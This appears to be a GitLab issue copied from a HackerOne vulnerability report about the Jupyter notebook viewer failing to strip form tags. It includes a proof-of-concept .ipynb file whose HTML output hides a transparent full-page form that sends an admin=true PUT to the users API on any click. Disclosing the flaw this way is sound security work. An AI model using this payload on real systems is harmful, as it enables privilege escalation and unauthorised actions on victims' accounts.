Skip to content

Issue any http requests when users view a .ipynb notebook and click anywhere

HackerOne report #1563379 by yvvdwf on 2022-05-09, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

Hello,

The santization of a .ipynb notebook viewer does not exclude form tag. Consequently attackers may introduce a form which allows to send arbitrary POST requests to the server. PUT, DELETE, PATH requests can be achieved by setting value of_method field.

Attackers may also use class attribute to change the form submit button as a topmost transparent layer to intercept users' clicks. In the following example, users click anywhere on the webpage to trigger a form submit.

Steps to reproduce
  1. In an existing project or create a new one, add a file, notebook-test.ipynb (you can change the basename but the .ipynb extension is important) with the following content:
{
  "cells": [  
    {  
      "cell_type": "code",  
      "source": [ "print(\"Hello world\")"],  
      "outputs": [  
        {  
          "data": {  
            "text/html": [  
              "<form action=/api/v4/users/5212593 method=post>",  
              "<input name=_method value=PUT type=hidden>",  
              "<input name=admin value=true type=hidden>",  
              "<input type=submit class='fixed-top fixed-bottom text-hide gl-font-size-42 cursor-default' value='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'>"  
            ]  
          }  
        }  
      ]  
    }  
  ]  
}
  1. After committing the file, view it and click anywhere on the webpage. You will see a POST request to /api/v4/users/5212593. This is an example to escalate my account as Admin.
Impact

Attackers may trick users to perform unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc.

Examples

This example is in private mode, please tell me if you cannot access: https://gitlab.com/yvvdwf/xss/-/blob/master/notebook-form.ipynb

What is the current bug behavior?

The sanitization does not exclude form tag

What is the expected correct behavior?

The form tag should be excluded

Output of checks

This bug happens on GitLab.com

Impact

Attackers may trick users to perform unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: